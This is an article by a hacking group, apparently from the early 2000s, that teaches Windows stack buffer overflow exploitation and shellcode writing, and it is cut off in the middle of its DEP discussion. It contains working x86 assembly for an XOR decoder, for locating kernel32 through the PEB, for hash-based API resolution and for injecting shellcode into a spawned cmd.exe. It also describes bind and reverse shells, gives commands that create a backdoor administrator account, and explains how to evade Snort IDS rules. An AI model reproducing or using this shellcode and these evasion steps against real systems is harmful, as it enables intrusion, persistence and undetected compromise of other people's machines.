Smashing the Stack for Fun and Deception Jaywalker's No-Nonsense Guide to Compromise Security Category: Computer Security Platform: Microsoft™ Windows© Level of Difficulty: 1 2 3 This article builds on advanced knowledge of Assembly language and Microsoft Windows API programming. There is no knowledge that is not power. © Master of Disaster Hacking Group 1998-2004, All rights reserved. Legal Issues: The author reserves the rights not to be responsible for topicality, correctness, completeness, fitness, or quality of the information provided in this document. I disclaim all other warranties and conditions either implied, expressed, or statutory, including, but not limited to (If any) implied warranties, duties, and responsibility of merchantability, of fitness, for a particular purpose, of reliability or availability, of accuracy, of completeness, of responses, of results, of lack of viruses, of lack of damages, and of negligence, all with regard the article and its peripheral attachments. The Master of Disaster Hacking Group reserves the right to change or discontinue this document without prior notice. 1 Table of Contents Foreword Introduction.......................................................3 Abstract..............................................................3 Stack Primer Stack Overview……………………..........................3 Stack Frame........................................................4 Buffer Overflow Rundown on Buffer Overflow.......................5 General Considerations .................................6 ShellCode Breakdown of ShellCode ...............................7 Buffer Overrun Mounting ..............................7 Getting your feet wet! ShellCode Development..................................8 Finding EIP...........................................................8 Decoder ...............................................................8 Locating Kernel32 ............................................9 Pinpointing Functions ....................................10 Migrating to Another Process .....................12 2 Spawning Shell ................................................13 Network Communications …………….….……….14 Avoiding IDS Detection! …………………..………..15 What Goodies Are Along This Article? ………….….16 Closing …….…………………………………………………………16 References ………..………………………………….……………17 Foreword Introduction Nowadays computer security seems to be dominating computer science. With growth of computer's power, the software's and hardware's demands outrun our ability to keep up with the changes in the field. Security was of no tribulation some time ago and the masses did not seem to show concern for privacy. But when cyberpunks hit the streets, new branches of computer science are sprouting up ever since. Among those are the eminent emergence of cryptography, IDS, enterprise firewalls, and other security-related technologies. Computers are getting hooked up to the Net evermore and in the meantime many are oblivious to the dangers involved. There are a lot of security myths floating around that we believe are often as dangerous as the security hole at least. One of the myths is that breaching security of Windows™ is much more difficult than Linux and UNIX systems; the other is that these systems contain more security-critical vulnerabilities compared with others. We fight these myths tooth and nail. What we intend to present is about breaching one of those insecurities that is commonplace in Windows operating systems. To demonstrate what a real penetration is like, we also have created a hypothetical vulnerable program and put our attack tools into practice. This can serve both as a proof of concept and as our effort to fight one of those myths. This can lead you to believe that an effective attacking tool can be created for any system. The widespread outbreak of Win32.Sasser and Blaster viruses is the palpable testimony to the infamous type of vulnerability, which is the 'buffer overflow'. These wild malicious codes are able to infect numerous computers at high rate by leveraging buffer overflows. Buffer overrun can result in application crash or it may have the 3 very destructive effect of code injection. If exploited properly one is able to run its code of choice. Abstract Severe security problems can occur when buffer and memory overflows occur in applications. I set out to present the details of mounting this type of attacks against applications. I first give a lowdown on stack and its functions, then proceed to explain overflow concept and its ramifications on the execution flow of running programs. In particular we will cover how to write shellcodes to achieve buffer overflow attacks, and discuss how to pass through firewalls with minimal trace using shellcode and give the attacker ability to interact with victim's box. Finally we will conclude our discourse with new methods in buffer overflow prevention technologies and their shortcomings. Stack Primer Stack Overview Stack is the memory space allocated inside the boundaries of a process's memory space. Stack is mostly used by a program to dynamically allot memory for arrays and variables declared inside functions, or to store data temporarily. Another use of stack is to provide a means to keep track of where to enter and exit procedures. Stack is also used to pass parameters to procedures. Stack works on a first-in-last-out basis, that is the first to push on stack is the last to be popped out of it. In Assembly language stack position is identified by ESP (Extended Stack Pointer), when a program's execution begins, it starts with ESP pointing to the end of the stack. Every time a word (double byte) is pushed on stack, ESP will be decreased by 2; in reverse, when a word is popped out, ESP will be added with 2. That’s to say, next available position on stack is top of the stack. An important consideration when using the stack is to be symmetrical in the byte count of what is pushed and what is popped. If the stack is not balanced on exit from a procedure, program execution begins at the wrong address which will almost exclusively crash the program. In most instances, if you push a given data size onto the stack, you must pop the same data size. Our discussion is focused on Intel 32 bit x86 compatible CPUs, what we present is not applicable to other CPUs such as Intel's 64 bit Itanium CPUs (IA64) that has 128 general-purpose r-registers plus 128 floating point f-registers, not mentioning the left 8 branching registers! It lends itself to another full-blown book of its own. Stack Frame In x86 CPUs, parameters are traditionally passed on stack. A glance at the assembly code generated for a function call reveals that for each parameter a PUSH command has been produced. Once all parameters have been pushed on stack, a CALL command transfers control to the target routine. The CALL instruction pushes EIP of next command on stack so that it can find where to land after its return from procedure. The x86 stack frame uses EBP (Extended Base Pointer) to access the frame. Stack frame is typically set up at the start of procedure by the following code, known as prologue: 4 PUSH EBP MOV EBP,ESP SUB EBP,XX where xx is the amount of bytes allocated for local variables of routine. Below is a typical figure of a stack frame: Bottom of Stack Higher Memory Addresses Passed Parameters Return Address Previous EBP EBP Exception Handler Frame Top of Stack Local Parameters Lower Memory Addresses Typical Stack Frame The key point here is that program accesses its parameters via relative addressing based on EBP. For instance, EBP+0 points to previous stack frame, EBP+4 is the function's return address. The function's passed parameters are at positive relative address from EBP. The first parameter is at EBP+8. Other subsequent parameters are at addresses multiplicative of eight, that is EBP+0xC, 0x10, and so. The function's local variables will be at negative address from EBP. As usual these rules are apt to be overturned, many optimized compilers do not push the EBP and access both local and passes parameters at positive offset from EBP. Moreover some variables can be kept in registers rather than on stack. Return values are conventionally stored in EAX register if it is four bytes of less, and if it is eight byte will be returned by EDX:EAX pair, that is, higher order bytes in EDX and lower order bytes in EAX. As you saw stack is composed of stack frames that are pushed at function entries and popped at function exits. As more data are pushed, stack will grow down in memory, but keep in mind that ESP will always point to top of stack. Stack frames can also be made and cleaned up by ENTER and LEAVE commands. We did not mention what exception frame handler is, it is actually used by compilers to catch run-time error, it points to a structure known as EXCEPTION_REGISTRATION, it is a linked-list of structures that compilers use to catch exceptions, do you remember the try-except-finally in programming languages like C++,VB .Net and so? We'll talk more about it here. Buffer Overflow Rundown on Buffer Overflow Now suppose that a function tries to write something on the stack, typically it will use the space allocated for its local variables to store its needed data. Some string functions that are mostly peculiar to C++ do not check the string's length properly and therefore are prone to write past the space allocated for its local parameters. Hence it is possible in some scenarios that a program can corrupt its stack by writing more data than allocated. Therefore it can modify value of previous stack frame, returned address and even the passed parameters. The problem is encountered just as the 5 function returns; when procedures are finished with their job they clean up the stack frame by releasing the stack space allocated for local variables by the following epilogue: ADD ESP,XX POP EBP RET When CPU tries to jump out of procedure by executing the RET instruction, it takes 'Return Address' as the new execution point from the stack and starts running codes at that location. If the stack had been written with no special plan ahead of time, control would branch out to location where arbitrary code will run or to a location where it has no access to touch. In worst-case scenario, the latter one, this can lead to access violation error and our program will terminate. In former scenario, our code will be running arbitrarily and no sooner than a few bytes along program will crash, either because it jumps to an unavailable location or it ends up like the former case. So far we have learned that stack overflow can seize control of execution or can rip it to shreds. Nonetheless we intentionally want to cause it, because it empowers us to rule over the crashed program. The question now boils down to 'How?’. We must feed the target application with data that has been especially crafted; we set it so that the return address will land us to the location of our choice. Thus we are able to grab control and force the overrun program to execute location we want. This location is the place where our program overflew the stack. In other words, we inject runnable code on stack, this way our code finds a chance to run after the buffer overflow hit. General Considerations Thus far you must have been familiar with concept of this kind of attack. Now to recap, we inject assembly opcodes plus return address into program, when it copies this unusually large data on stack we have the return address replaced by our own, upon return the return address places us in middle of data on stack, that is, our code, and our crafted code assume power this minute. The code that will get a piggy back ride on the crashed program is called 'payload', if payload spawns a shell it is called a 'shellcode'. Shellcodes are written in assembly language and then compiled; the .text part of the resulted PE file is then extracted to form the runnable part of shellcode. What to consider in a buffer overflow attack? Our shellcode must conform to the protocol by which it is being transferred. Return address must be so that it jumps right on shellcode, so we find an opportunity to run our injected shellcode. Having a robust shellcode is a must. Now the solution to each question posed: 1. Some protocols cause further constraints for us, for example, it may not accept any zero characters or other special characters, so we must write a shellcode that does not contain any zero character. To overcome this issue we encode our shellcode and append a small decoder at the beginning so that it can be decoded before running. The best encode-decode scheme is xor-encoding it with a byte, so the decoder and encoder will be the same. If shellcode is 6 transferred by TCP or UDP protocols we are at the mercy of the target program; some programs do not accept special characters especially zeros. 2. Running processes almost start execution at addresses like 0x0040000 or so, this causes further problem for us since every instruction in code will be around this number. The trouble with this number is that it contains two zeros before the four. Suppose that a console application is our target, and we need to feed the return address, because it has two zeros before four we can not key it in. This problem can be overcome with ease. We look up the name of dependencies an application loads at startup. By knowing the context of target at which it is running at the time of exploit, we can proceed and see what registers point roughly to our shellcode, choose one, if there is nothing other that ESP, we choose it. Then search each dependency and look for a 'JMP ESP'(in hex code it is 'FFE4') or 'CALL ESP'(in hex code 'FFD4'). Program's dependencies like ntdll.dll, kernel32.dll, user32.dll,... will be loaded at some prediefined base addresses,for example in WinXP SP1 in kernel32.dll at address 0x77E6FA88 there is 'jmp eax'. We set the return address to this value, so when function is returned it will jump at this address in kernel32.dll, and this jump places us at shellcode. So shellcode will get to run at this stage. 3. Shellcode must be robust, that is we have no idea of where exactly our shellcode will start running. If we need to call API functions we need to know where in memory we are, at what address kernel32 base address is, and so forth. Shellcode must also be relocatable, that is, able to run anywhere in memory such as heap, stack or data segment. To overcome this we use relative addressing feature of assembly language. ShellCode Breakdown of ShellCode Exploit consists of two major components: 1. Exploitation technique and 2. Payload Objective of payload is to divert execution path of vulnerable program. We can achive this via a variety of methods: Stack-based Buffer Overflow Heap-based Buffer Overflow Format String Integer Overflow Memory Corruption Each vulnerability has different methods to trigger. Yet shellcode can be written to be reused. The code of our choice or payload can theoretically do anything on the target computer under the security context of the vulnerable program. If the target program is a system service, payload can take full control of system without any limitation. Shellcodes can give attacker an interactive command prompt to further his cause. The attacker may explore the target system to discover network structure, to penetrate other vulnerable systems. A simple 'net veiw /domain' reveals a lot of facts. Shell may also allow attacker to upload or download files, install trojans or backdoors, keylogger or sniffer, Enterprise worm or rootkits(special hacking tools that gives full anonymity in system even at kernel-mode level, attacker can cover his tracks and hides his trails through the system by rootkits). Shellcode can also wait for commands from attacker. 7 Buffer Overrun Mounting Payload is comprised of a sequence of codes. First we put a prologue; it can be a xor-decoder or some other garbage code. Why garbage? That's because sometimes the return address will put us somewhere in the middle of our payload. Taking this into account, we must put several NOPs before the decoder; NOP opcode is 0x90, so the beginning of many shellcodes is full of 90's. After the shellcode we place the return address (to a jump instruction in kernel32 of ntdll) so that when execution diverts, it puts us back in shellcode. The smashed stack must look like the following after payload overwriting it: 90909090909090909090 90909090909090909099 Execution is Xor-Decoder diverted to our shellcode ShellCode modified return address Stack of target JMP ESP or so Kernel32 or other dependencies of target Smashed Stack Some C++ funcions like strcpy, wcscpy, scanf ,... and a couple of API functions like lstrcat,lstrcpy,lstrlen,wsprintf, GetAtomName,LoadString, GetMenuString are subject to buffer overrun attacks. That's all because these functions do not check string length properly and just copy string from source to destination. Getting your feet wet! ShellCode Development While each vulnerability has different method to exploit, the shellcode can be written to be flexible and usable. In Microsoft Windows, shellcode must first find its location in memory and attempts to decode its executable part. Then it should find kernel32 base address to run its necessary API functions. Finding EIP Assembly language has no instruction to retrieve EIP, however during run of applications EIP keeps changing when CPU executes opcodes. Knowing that CALL instruction change EIP and make a copy of it on stack, we can proceed to find EIP easily as follows: CALL $+2 ; use relative addressing to jump at next instruction POP ESI ; ESI will contain current EIP The CALL instruction will divert execution flow to next instruction (POP ESI) and stores EIP on stack, next opcode pops EIP out of stack and put it into ESI. 8 Decoder Decoder uses a simple algorithm, just reverse process of encoder. Encoder Xors each byte with a predefined byte and add it with one, so for decoding we first subtract it from one and then Xor it with the same predefined value. Following show snippet of code that both finds the location shellcode where decoder must start its job and decode it afterward: pXore pXore Proc CLD JMP $ + 24 POP ESI PUSH ESI MOV EDI , ESI XOR ECX , ECX MOV CX , 0123h LODSB SUB AL , 1 ; Clear direction falg, so string operations will increase both EDI and ESI ; Jump at 'CALL $ - 22' ; Pops EIP, EIP will exactly point to location of opcodes just after 'CALL $ - 22' ; Save a copy of ESI ; Means both source and destination of string operation point to encoded opcodes ; Zero out ECX and get ready for loop ; 0123h depends on length of encoded shellcode ; Load one byte of encoded shellcode and put into AL ; Subtract from one XOR AL , 0F6h ; Xor result with predefined byte STOSB LOOP $ - 6 JMP $ + 4 CALL $ - 22 Endp ; Store decoded shellcode back to its original location ; Loop back to LODSB ; Jump at the decoded shellcode and run it smoothly ; CALL the instruction 'POP ESI' I hope the above code is self-explanatory. Locating Kernel32 To execute API function one must use LoadLibrary and GetProcAddress, but using these functions require knowledge of their location in memory. I present a global method for locating kernel32 in memory that is independent of system platform. Answer lies in TEB (Thread Environment Block), it is a special structure present in memory space of each thread running in Windows. Though an undocumented structure, it has been reverse engineered and its source is widely published. TEB is located at address FS:[2Ch] of each thread. It contains all sort of information including environment pointer, active RPC info, PEB, last error code, thread info, thread locale, execption code, GDI pen, brush, region, TLS location, stack commit max and so forth. As a matter of fact FS is one important register for every thread in Windows, to say the least, FS:[00] points to SEH (Structured Exception Handling), FS:[04h] to stack user top, FS:[08h] to stack user base, FS:[10h] to fiber data field, FS:[20h] to process ID, FS:[24h] to thread ID, respectively. Among these fields, at offset 30h of TEB we can find PEB(Process Environment Block). PEB is neither documented in SDK nor in DDk, but can be viewed by a kernel-mode debugger like windbg. At offset 0Ch of PEB we reach LoaderData, it is a handle to another structure called PEB_LDR_DATA. 9 typedef struct _TEB { NT_TIB Tib; PVOID EnvironmentPointer; CLIENT_ID Cid; PVOID ActiveRpcInfo; PVOID ThreadLocalStoragePointer; PPEB Peb; ULONG LastErrorValue; ULONG CountOfOwnedCriticalSections ... PVOID StackCommit; PVOID StackCommitMax; PVOID StackReserved; } TEB, *PTEB; typedef struct _PEB { BOOLEAN InheritedAddressSpace; BOOLEAN ReadImageFileExecOptions; BOOLEAN BeingDebugged; BOOLEAN Spare; HANDLE Mutant; PVOID ImageBaseAddress; PPEB_LDR_DATA LoaderData; PRTL_USER_PROCESS_PARAMETERS ProcessParameters; PVOID SubSystemData; ... ULONG TlsExpansionBitmap; BYTE TlsExpansionBitmapBits[0x80]; ULONG SessionId; } PEB, *PPEB; typedef struct _PEB_LDR_DATA { ULONG Length; BOOLEAN Initialized; PVOID SsHandle; LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; } PEB_LDR_DATA, *PPEB_LDR_DATA; struct LIST_ENTRY{ struct LIST_ENTRY* Flink; struct LIST_ENTRY* Blink; }; As you see, PEB_LDR_DATA has a member called InInitializationOrderModuleList that is structure of LIST_ENTRY type at offset 1Ch, this structure is a linked list that has information about every module loaded by process. By walking down this list we reach the second entry that is pointer to base address of kernel32. The first entry is a pointer to ntdll. Following is the equivalent aseembly code that puts base address of kernel32 in EDX: LocateKernel Proc assume fs:nothing mov eax,fs:[30h] mov eax,[eax+0Ch] mov esi,[eax+1Ch] lodsd mov edx,[eax+8h] LocateKernel Endp ;Remove any assembler's prior assumtions from fs ;Get pointer to PEB structure at offset 30h in TEB ;Get PEB_LDR_DATA ;Get InInitializionOrderModuleList in PEB_LDR_DATA ;Load dword from ds:[esi] into eax ;Get second entry on table, that is kernel32 FS register PEB TEB 30 PEB_LDR_DATA 1C 0C ntdll LIST_ENTRY kernel32 other modules Schematic of our procedure 10 other modules Pinpointing Functions Having found base of kernel32 we have no problem retrieving our desired API functions from it. Since PE files in memory has very similar structure to their format on hard disk, and its format is well documented we can find the function pointer we need. From SDK documentation, each PE file starts with a IMAGE_DOS_HEADER followed by a MS-DOS stub, IMAGE_NT_HEADERS, IMAGE_FILE_HEADER, IMAGE_OPTIONAL_HEADER and then PE sections succeed them all. At offset 3Ch of IMAGE_DOS_HEADER (first header), there is a pointer to IMAGE_NT_HEADERS. At offset 78h of this structure we find the pointer to the first DataDirectory, this first entry is a pointer to IMAGE_EXPORT_DIRECTORY, the second is to IMAGE_IMPORT_DIRECTORY. By having this structure we can find a pointer to AddressOfFunctions that leads to all the RVA (Relative Virtual Address, that is, relative to base of image) of exported function by kernel32. So to find location of a function exported by kernel32, we obtain a hashed value for it to save space, and at run-time compute hash of names of function(pointed to by AddressOfNames) and compare it with our own hash, if they're the same we are positive that we have found the address of right function. The hash function is simple algorithm based on sum and rotation. Following is the complete GetProcAddress for finding address of every function, given that EDX is the base address of kernel32 and ECX has hash of function name. GetProcAdd Proc ;Simulated GetProcAddress, it looks for signature of function in module export table cld ;Clear Direction Flag , makes esi,edi to increment after string instructions. mov esi,edx ;EDX = module base address ;see "PE format.txt" for details of PE file formats movzx ebx,word ptr [esi+3Ch] ;Retrieve pointer to IMAGE_NT_HEADERS, located just after IMAGE_DOS_HEADER mov esi,[esi+ebx+78h] ;load first RVA IMAGE_NT_HEADERS.IMAGE_OPTIONAL_HEADER.DATADIRECTOR[0].VirtualAddress lea esi,[edx+esi+1Ch] ;The first element of array is always the address and size of the exported function table. ;The second array entry is the address and size of the imported function table. ;1Ch=((IMAGE_EXPORT_DIRECTORY *)VirtualAddress)->AddressOfFunctions lodsd ;load function table address add eax,edx ;RVA to VA push eax ;Save function table address lodsd ;Address of names, also esi is incremented add eax,edx ;RVA to VA push eax ;Save address of names lodsd ;Address of ordinals add eax,edx ;RVA to VA pop ebx ;ebx=address of names push eax ;Save address of ordinals xor eax,eax ;Index i1: mov esi,[4*eax+ebx] ;Pointer to address of exported function names add esi,edx ;RVA to VA; at first run, esi is pointing to the name of ActivateActCtx(1st kernel32 func name!!!) and so forth. push eax push ebx xor ebx,ebx i2: xor eax,eax lodsb ;Load byte at eax, it is actually the current character at that rol ebx,5 ;Rotate 5 bit to right add ebx,eax cmp eax,0 jnz i2 ;Go on if we have not yet reached end of the string ror ebx,5 cmp ebx,ecx ;Compare hashes pop ebx pop eax je i3 ;Function found inc eax jmp i1 ;Try next function i3: pop ebx 11 movzx esi,word ptr [ebx+2*eax] pop eax mov esi,[eax+esi*4] add esi,edx ret GetProcAdd Endp ;Get index out of ordinals table, note that ordinal is 2 bytes ;Get function address in memory from "address of names table" ;RVA to RV ;We managed to finagle the function address and put it into esi! The above code is basically simple if you read it thoroughly; it does the same job as GetProcAddress in Windows API. To recap, it first retrieves a pointer to Export Table of kernel, and from there it finds AddressOfOrdinals, AddressOfNames and traverses down the list of function names, hashing each name and comparing it with value of our own hash at ECX, if the two match, we have reached the correct function. At this time we can just sit back and have every function you fancy run at will, it is a simple matter for our shellcode now to start its job on the attacked system and enjoy itself. For example if you want to call the function GetSystemDirectory from kernel and discover the path to system directory from shellcode just hash the real name of function in kernel32, which is GetSystemDirectoryA. The result of hashing will be Module Image AACCFB39h, so follwing code will run smoothly the function: Image Export Directory MOV ECX , 0AACCFB39h CALL LocateKernel CALL GetProcAddr CALL ESI ; Put hash of GetSystemDirectoryA in ECX ; Find base address of kernel32 ; Find address of function in memory and put it into ESI ; Calling ESI is equivalent to calling the function directly! 0 IMAGE-DOS-HEADER MS-DOS Stub Program Data Directory IMAGE-NT-HEADERS 1C IMAGE-OPTIONAL-HEADER Section header 1 Names Section header 2 Ordinals Functions ..... Section 1 GetSystemDirectory Section 2 ..... Address Schematic View of Algorithm Migrating to Another Process After a vulnerable service is attacked, chances are the system become unstable, it may even crash and makes user notice suspicious activity, or the attack may even bring down the whole system altogether or in worst-case scenario the attacked service may have one of its threads generate error and terminate itself 12 unexpectedly, so our shellcode bacomes orphan. Otherwise AVP or IDS systems may detect this attack and crash dump may be left on system with our track in memory. To avoid this problem, shellcode must immediately migrate into another process and safely connect back to attacker and allow him to further explore the system interactively. There is no equivalent of process forking as is in Unix or Linux. LSD proposed their method regarding process forking, but I could not get it to work, so I forged ahead with my own. To migrate into memory space of another process, we first create an arbitrary process in memory using CreatProcess(), my choice is cmd.exe, and put it into suspended mode, so it does not start running until we signal it. Next allocate enough memory inside the suspended process using VirtualAllocEx(), copy your shellcode in the allocated memory by WriteProcessMemory(), finally create a remote thread inside it using CreateRemoteThread(), note that you must set the thread base address to the base address of allocated memory. This is a very robust, safe and flexible method to move into another process. pFork proc local pPI[15]:BYTE local pSI[16]:DWORD local Base:DWORD jmp tFork align 4 ; 16 bytes, process info structure ; 68 bytes, startup info structure dFork: db db "Remote Shell by NiTro",0 "cmd",0 tFork: mov ecx,16 .REPEAT mov pSI[ecx],0 ; Zero out the structure .UNTILCXZ mov eax,offset dFork mov pSI[0],68 ;cb, size of structure mov pSI[0+3*4],eax ;lpTitle lea eax,pPI[0] push eax ;lpProcessInformation lea eax,pSI[0] push eax ;lpStartupInfo push 0 ;lpCurrecntDirectory=NULL push 0 ;lpEnvironment=NULL push 4h ;dwCreationFlags=CREATE_SUSPENDED push 0 ;bInheritHandles=FALSE push 0 ;lpThreadAttributes=NULL push 0 ;lpProcessAttributes=NULL mov eax,offset dFork+22 ; Offset of "cmd" push eax ;lpCommandLine="cmd" push 0 ;lpApplicationName=NULL call LocateKernel mov ecx,0B87742CBh ;Hash of CreateProcessA call GetProcAdd ;Find location of CreateProcessA in kernel32 call esi ;Invoke CreateProcessA push 40h ;PAGE_EXECUTE_READWRITE push 1000h ;MEM_COMMIT push 5000h ;20kb push 0 ;Start at address zero(means do not care) lea eax,pPI[0] ;hProcess(By value) push [eax] call LocateKernel mov ecx,0E9D81A3Bh ;Hash of VirtualAllocEx call GetProcAdd ;Find location of VirtualAllocEx in kernel32 call esi ;Allocate memory in the new process mov Base,eax ;ebx=base address of the allocated region of pages mov ecx,offset pDummy ; Base address of our shellcode to be moved into new process push 0 push 800h ;Write 2k memory push ecx ;lpBuffer push eax ;lpBaseAddress, base address indicated by VirtualAllocEx lea eax,pPI[0] push [eax] ;hProcess(By value) call LocateKernel 13 mov ecx,0A6A6793Dh call GetProcAdd call esi lea edi,pPI[4] push [edi] call LocateKernel mov ecx,0195D7906h call GetProcAdd ;call esi pFork push 0 push 4h push 0 push Base push 800h push 0 lea eax,pPI[0] push [eax] call LocateKernel mov ecx,07231F46Ch call GetProcAdd call esi push eax call LocateKernel mov ecx,0195D7906h call GetProcAdd call esi ret endp ;Hash of WriteProcessMemory ;Find location of WriteProcessMemory in kernel32 ;Write memory in the new process ;hThread(By value) ;Hash of ResumeThread ;Find location of ResumeThread in kernel32 ;Invoke ResumeThread ;lpThreadId ;dwCreationFlags=CREATE_SUSPENDED ;lpParameter ;lpStartAddress ;dwStackSize ;lpThreadAttributes ;hProcess(By value) ;Hash of CreateRemoteThread ;Push hThread on stack ;Hash of ResumeThread ;Find location of ResumeThread in kernel32 ;Invoke ResumeThread Spawning Shell Now comes the salient part. Spawning shell will make attacker's day! Attacker wants to remotely and interactively work on shell and do his dirty work on victim's box. To perform this action we use CreateProcess() function to execute an instance of command interpreter, but with redirected standard input, output and error assigned to anonymous pipes(using CreatePipe()), and transmit data between attacker and shell using sockets. In this mechanism, we perform blocked reading of socket and retrieve revieved data and put in the stdin of cmd as input for processing, then use Sleep() to wait for the cmd to properly handle command execution, next use PeekNamedPipe() in a non-block way to check if any data is to be read from stdout or stderr. If any, we can send back the result using socket to the attacker. At this stage, our shellcode will wait for data on socket.Unfortunately, if any data arrive at stdout or stderr at this time; they will not be read until next command from attacker is received from socket. There is however a better solution that does not have this disadvantage. In this case a direct handle to the network socket is used (created using WSASocket()) instead of anonymous pipes. The command interperter will directly reads/writes to/ or from the socket directly while shellcode waits for its termination using WaitForSingleObject(). Yet this method has another disadvantage, if the command interpreter hangs in the meantime, shellcode will be blocked indefinitely and attacker practically has no choice to re-establish connection with victim. LSD proposed much complex but elegant and more prudent synchronization method for this problem. In Microsoft Windows WaitForMultipleObjects() is used for synchronization of objects. The function waits for any of several functions to be signaled and return the object causing this signal. It can handle change notification, console input, event, job, mutex, semaphore, process, thread, waitable timer. It is evident that this function can notdoes not allow dirrect monitoring of socket and outputs from console applications. However it can be achieved using event objects. The only way to associate an event with a pipe handler is to use overlapped mode. To do this, we create an event through CreateEvent() function and use the handle to this event as argument to ReadFile() 14 operation. This allow the calling process to resume execution with no blocking, if the function is pending, wait functions will return non-signaled status.Upon finish, the application can get result of operation by GetOverlappedResult() function. In this procedure we must use named pipes instead of anonymous pipes. Synchronization with socket objects can be accomplished using WSACreateEvent() function. Association with event object can be made by using WSAEventSelect(), notice that this function puts the socket to non-blocking mode. After this, socket handles can be used as input for WaitForMultipleObjects(). When this function alerts us, we can use WSAEnumNetworkEvents() to discover occurrence of our desired event. To set the socket back to blocking mode IOCtlSsocket() must be called. Network Communications Every shellcode must eventually interact with attacker, giving him use of executing commands on victim’s box. On Microsoft Windows applications must leverage Winsock API to interface with network protocols and communicate with the other party. To initialize Winsock library one must first call WSAStartup() function to initiate ws2_32.dll in process. The process can take three different methods to complete the process of communication. First one is to create a socket, bind to a port, listen to incoming connection and accept the newly created socket. Through this method attacker can establish connection to a known port on victim’s machine and handle communication with shellcode. It’s also very convenient to create multiple connections with shellcode. But the downside is that sometimes there is not a faint chance of this job. Chances are the server is protected by corporate firewalls and tight security configurations which only allow connection through port 80(http) and in rare case of a vulnerability in www server, it does not allow outbound connection on other ports other some well-known and already used ports, even if a successful exploitation of security hole is achieved. Only solution for this case is a familiarity of the specific firewall settings and using those ports for attack. In second scenario, shellcode creates a backward connection to the external system from which the attack had been initiated. In this sense, shellcode does not need to bind and wait on a port, but it tries to periodically connect to attacker’s machine via the port from which attack was conducted. Third scenario is innovated by LSD. In this method shellcode walks through the process handler table and search for a socket handler of remote TCP endpoint identified by the given source port. GetPeerName() function is used to get information, IP address and port number, about the second side of connection. This found information is reused to communicate with attacker. Note that this method does not leave any further trace on the compromised system’s IDS or firewall. Even if the port is already in use you can bind to this port by setting the SO_REUSEADDR flag with a call to setsockopt() function. Given the process that uses the port has set SO_ EXCLUSIVEADDRUSE option on port, this method will fail. But Phrack suggested to terminate the process owning the port and take over it entirely. To forcefully terminate the process TerminateProcess() function is called. This function needs the handle to the process, but our shellcode reside in memory address of the same vulnerable service and ending the service will mean end of our shellcode. Now comes importance of process forking to mind, we jettison shellcode out of vulnerable process and before running it terminate the service by passing -1 as the handle to the current process to TerminateProcess() function. If it is needed we can restart the vulnerable service by a variety of methods, for example if it is IIS, we can use TaskScheduler 15 command like “at <time> iisreset”, if it is the SQL service we can use “net start sqlserveragent”, and so forth. All said and done, you can always feed cmd with command line options that will execute the desired actions on the compromised system and then the shellcode can die. For example the following commands will create a new user on the vulnerable system as an administrator: cmd /c net user /add compaquser compaqpass cmd /c net localgroup /add administrators compaquser Through the establishment of a connection with the attacker, he can even upload or download files on/from the victim’s machine. This is necessary as a portion of full penetration test. Hence attacker can install backdoors to maintain access on machine or steal sensitive information from it. File upload/download can be easily performed by just opening a file by CreatFile(), reading/writing data from/to port and writing/reading it to file using WriteFile()/ReadFile() functions respectively. Avoiding IDS Detection! Snort is a free, yet formidable, IDS tool that has over thousands of rules for detecting attack possibilities. It works on the basis of examining captured packets; whenever a criterion is met it takes appropriate action for defense. Every time a cmd is started, it will display: Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\...> Snort rule number 2123 captures this banner, we can easily suppress this by using “cmd /k”. There is also another rule(6622) that captures directory listing result of “dir”, if a match is hit, it trigger an alert. dir Volume in drive C is Cool Volume Serial Number is SKSK-6622 To avoid this we can use “/b” with dir command. It’s always best to use the following command to permanently put this option in effect: Set dircmd=/b Snort also has signature that detect "Command completed". This command usually generated by the "net" command. It is easy to create a wrapper for the net command that will not display "Command completed" status or use other tools like "nbtdump", etc. What goodies are along with this article! In this section we talk about the package that is along with this article. As proof of concept I have included MOD.asm file as source to assembly code that contains core functions for shellcode. It is able to self-decode, fork itself, shutdown the parent process, start socket function in new process, wait for connection from binding to port and spawn shell. After a successful connection has been made on port 4660 of the victim’s machine, attacker is given a shell that can execute commands and let him upload or download files on server. Use Nitro.exe to establish this connection with victim’s box. It is only enough to specify the IP address of victim’s computer to make the connection. To show how a real exploit may be used against a vulnerable 16 application I have also included Smash.exe that has a vulnerable function, when exploited by stuffing more data on stack it will crash and the shellcode will have a chance to run. You may perform all these tests on your machine. First run smash.exe and press any key to crash, it does all this internally. Afterward shellcode is in memory waiting for connection on port 4660, use Nitro.exe to make connection to your own machine (127.0.0.1) and try the shellcode! MOD.asm can be compiled using MASM from www.masm32.com, the result is an executable called MOD.exe, notice that it can not run independently. To extract the actual code part of this executable, that is, apart from unneeded sections of COFF files, I have wrote a program called AsmTools.exe that can extract the .Text part of PE files. To use it just open the MOD.exe file by pressing “Extract OpCode” button, it copies the contents of this file to clipboard, on next tab, encode, check the “encode shellcode”, this will automatically encode the appropriate parts of asm codes. On last tab, Section, press “Extract Sections” and then “Put on clipboard”, this will put the extracted opcode in hexadecimal on clipboard, it is now ready to be put in your C++ programs! The generated hex codes often end with a series of similar characters, please remove them from shellcode, they’re just extraneous. AsmTools has a button that can calculate the simple hash function any given function name, all shellcode use those hash functions for finding appropriate function calls. All source code to all programs are accompanied with this article, you can peruse over them ponderously before you execute them unwittingly. Closing Shellcode proved fatal in the terms of both full system compromise and overall computer takeover. We have shown how this unmitigated disaster can lead to total penetration of system. Working on the shellcode is still under way and too many security-concerned people have jumped on the bandwagon of this type of attack point. While vendors must take measures not to inflict damage on their proprietary software, this seems to be a futile effort, seeing that such errors are hard to spot, and too many often these errors go unnoticed from the eyes of programmers. Open source movement may alleviate this problem to some extent, but still does not stop hackers from pushing ahead with their findings. Microsoft as a giant has done lot to save its reputation from the status quo. In this way, it has initiated new technologies to fight the buffer overflow errors in Windows. In Windows 2003, it has introduced BOPT (Buffer Overflow Prevention Technology) and in Windows XP SP2 it has embedded DEP (Data Execution Prevention). BOPT works in a similar fashion to those other commercial security tools such as Entercept (now NAI Entercept) and Okena (now Cisco Security Agent). All rely on stack back tracing and do not really create non-executable stack or heap segments. They hook some OS level API calls and traverse through the stack frames and verify that the return address belongs to a memory mapped file and not to an anonymous part of memory, or they verify that the function call is originated from an instruction immediately following a jump or call. While it does not hook all versions of a particular function, nor it does this so deeply and thoroughly enough, it has a slew of shortcomings that can lead to stack-trace mechanism evasion and again allow buffer overrun. Data execution prevention (DEP) is a set of hardware and software technologies that perform additional checks on memory to help protect against malicious code 